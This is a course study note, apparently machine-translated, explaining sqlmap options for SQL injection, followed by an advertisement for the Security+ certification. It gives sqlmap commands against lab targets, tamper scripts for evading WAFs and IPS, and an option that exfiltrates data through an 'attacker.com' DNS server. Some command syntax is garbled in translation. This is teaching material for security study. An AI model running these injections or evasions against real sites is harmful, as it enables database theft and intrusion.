"Safe Cow Learning Note" Sqlmap automatically injects-inhection, DETECTION, techniques

SQLMAP Automatic injection-----Injection

-P

Specify the scanned parameters to invalidate the--level

-P "User-agent,referer"

--skip

Exclude the specified scan parameters

--level=5--skip= "Id,user-agent"

URI Injection Point

Sqlmap-u "http://targeturl/param1/value1*/param2/value2/"

[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--dbs

SQLMAP Automatic Injection-----Injection

--dbms

Mysql<5.0>

Oracle<11i>

Microsoft SQL server<2005>

PostgreSQL

Microsoft Access

Sqlite

Firebird

Sysbase

SAP MaxDB

Dbs

SQLMAP Automatic Injection-----Injection

--os

Linux

Windows

--invalid-bignum/--invalid-logical

Usually Sqlmap is invalidated with a negative value parameter id=13->id=-13

Bignum use large numbers to invalidate parameter values id=99999999

Logical using Boolean judgment to invalidate id=13 and 18=19

--no-cast

When extracting data, Sqlmap converts all results to strings and replaces null results with spaces

Old MySQL database needs to turn on this switch

SQLMAP Automatic Injection-----Injection

--no-escape

For the purpose of confusing and avoiding errors, when using single quotes to delimit strings in payload, Sqlmaps uses

char () Code escape method substitution string

SELECT ' foo '->select CHAR (102) +char (111) +char (111)

This parameter says turn off this function

--prefix/--suffix

query= "SELECT * from User WHERE id= ('", $_get[' id ', "') LIMIT 0,1";

Sqlmap-u

"Http://192.168.136.1.121/sqlmap/sysql/get_str_brackets.php?id=1"-p id--

Prefix "')"--suffix "and (' abc ' = ' abc ')

query= "SELECT * from Users WHERE id= (' 1 ') <PAYLOAD> and

(' ADC ' = ' abc ') LIMIT 0,1 ";

SQLMAP Automatic Injection-----Injection

--tamper

Obfuscation scripts for bypassing application-layer filtering, IPS, WAF

Sqlmap-u "Http://1.1.1.1/a.php?id=1"--

Tamper= "tamper/benween.py,tamper/randomcase.py,tamper/space2comment.py"-V 3

[Email protected]:~# dpkg-l Sqlmap | grep tamper

[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "--dbs

SQLMAP Automatic Injection-----DETECTION

--level

Level 1-5 (default 1)

/usr/share/sqlmap/xml/payloads

--risk

1-4 (default 1/harmless)

Risk increased risk of data tampering (update)

--string,--not-string,--regexp,--code,--text-only,--Titles

Page comparison, boolean-based injection detection, according to the change in the content of the return page to determine the true and false logic, but there are

Some pages change with the time threshold, you need to specify a string that identifies the true and False

[Email protected]:~# cd/usr/share/sqlmap/xml/payloads

[Email protected]:/usr/share/sqlmap/xml/payloads# ls

01_boolean_blind.xml 02_error_based.xml 03_inline_query.xml 04_stacked_queries.xml

05_time_blind.xml 06_union_query.xml

SQLMAP Automatic injection of-----techniques

Use all technologies by default

B:boolean-based Blind

E:error-based

U:union query-based

s:stacked queries (file system, operating system, registry must)

T:time-based Blind

SQLMAP Automatic injection of-----techniques

--time-sec

Time-based injection detection response delay time

--union-cols

Default union Query 1-10 column, up to 50 columns with--level increase

--union-cols 6-9

--union-char

Union queries use NULL by default, and in extreme cases null may fail, and numeric values can be executed manually at this time

--union-char 123

SQLMAP Automatic injection of-----techniques

--dns-domain

An attacker controls a DNS server that can be used to increase the speed at which data is extracted

--dns-domain attacker.com

--second-order

The result of a page injection, reflected from another page

--second-order http://1.1.1.1/b.php

SQLMAP Automatic injection of-----fingerprint

-F,--fingerprint,-b,--Banner

Database Management System Fingerprint information

DBMS, operating system, architecture, patches

This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes

security+ Certification Why is the Internet + era of the most popular certification?

Manifesto first introduce you to security+

        security+ certification is a neutral third-party certification, the licensing Agency for the United States Computer Industry Association CompTIA, is and CISSP, ITIL and other co-included in the international IT industry, one of 10 popular certification, and Ciss P security+ Authentication is more emphasis on information security technology and operation than information security management.

This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.

Why is security+ certification so hot?

        Reason one: In all information security certification, the emphasis on information security technology certification is blank,  security+ certification can make up for the gap in the field of information security technology.

      currently recognized in the industry of information security certification mainly Cisp and CISSP, but whether cisp or CISSP are emphasis on information security management, technical knowledge is broad and simple, the exam is around. And CISSP require a certificate of information security work experience for more than 5 years, Cisp also require a college education 4 years of working experience, these requirements will undoubtedly be able and motivated young people of the road blocked. In the real world, whether it is looking for a job or a raise, or a tender time to report personnel, certification is essential, which brings a lot of injustice to young people. The emergence of security+ can clear these young people career development obstacles, because security+ emphasis on information security technology, so there is no special requirements for work experience. As long as you have an IT-related background, the pursuit of progress can be studied and tested.

        Reason two:  it operation and maintenance personnel work and turn over the weapon.

        in the banking, securities, insurance, information and communications industries, IT operations personnel are very many, it operations involved in the face is also very wide. is a network, system, security, application architecture, storage as one integrated technology post. Although no program ape "born as a Bachelor, Die also write code," The solemn and tragic, but also has "Hoe wo Day Copse, as the operation of suffering" feeling. Every day to the computer and machine, the time has been inevitable for career development confusion and confusion. The advent of security+ international certification allows the pursuit of IT operations personnel to learn network security knowledge, to master network security practices. Career development in the direction of network security, to solve the problem of the shortage of information security personnel in China. In addition, even if not transformation, to do a good job in operation and maintenance, learning safety knowledge to obtain safety certification is also essential.

Reason three: grounding gas, international stylish, easy to test, moderate cost!

As the most influential global leader in the global ICT sector, CompTIA is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.

Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification.

"Safe Cow Learning Note" Sqlmap automatically injects-inhection, DETECTION, techniques